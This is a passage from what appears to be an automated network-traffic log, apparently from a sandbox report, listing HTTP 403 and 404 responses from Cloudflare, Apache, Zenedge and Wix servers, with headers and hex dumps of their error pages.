{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K4aSneP%2Fmo%2Fvy%2B8HaGRDqLD0j26wgjjbUjJdJf5ErLAm9hgf%2FEXRbdAjNJO1yGds%2Fs9yRXCH1l%2FaN%2FpoFenHpTxGKbM7RmJ6KhPZ4KMoIQx5G3r%2BeVLDFsLCb6o6SEykuQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=84.999800Server: cloudflareCF-RAY: 81371a255bfd2b9d-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:06 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4HDj2PYhPTvSisQ1tIGEJXQNZkoM2IzfifO7GrtW%2B8EZRQ3Rg8VOJ0a4TvGA0ZQqc%2FA9bYH2jEdGtGQ50bvTMcVipIw%2BhiUk5mejsek%2B1eEFkK6hNfU5n1QfOlenHMzH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a279b6b2a9f-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Mon, 09 Oct 2023 13:52:06 GMTCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: aae17c78fba3a69d4c7375a3148cfa2443b0668bX-Cache-Status: Server: ZENEDGEData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 33 31 37 31 22 2c 20 31 36 39 36 38 35 39 34 37 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 36 38 35 39 34 31 37 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 31 35 36 37 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 30 39 20 4f 63 74 20 32 30 32 33 20 31 33 3a 35 34 3a 30 36 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC3171", 1696859479, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1696859417 * 3.1415926535898; v = Math.floor(v); do
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:06 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6NNmoKQYFoIMawxArIHW1tgabtgmCcjIYXLV52gzkFYXfApqwEjlMrJV7lVXsuQX%2BoGZ9L5ouSNcMapS000NZZMHJbSiMq3NnasTR%2BjzJbhkHJkgpcpJZgDZgrxCEat%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a28bc6d2a9f-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:06 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Content-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:52:06 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: Pepyaka/1.19.10X-Wix-Request-Id: 1696859527.1093167598102413776X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 09 Oct 2023 13:52:07 GMTX-Served-By: cache-bur-kbur8200175-BURX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,dwc60INy8NFddnU/0WdlOB9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLoEHOoo/2p1KdeeIJMpyT5AG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:52:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lwrt0g0CyGofGmxc8cQqd%2FnIXc6AmQzUNAlDMNtFfSTB5XdWGQTWeyQT2bt%2FhHmQAHSGAutV5jsMexrNYb8aJ%2BCTy5nwdPTI%2BhWaRbLlakBKK9YpX06AfKcMdZWZWIMm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a2d5af22b8f-LAXData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv=
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 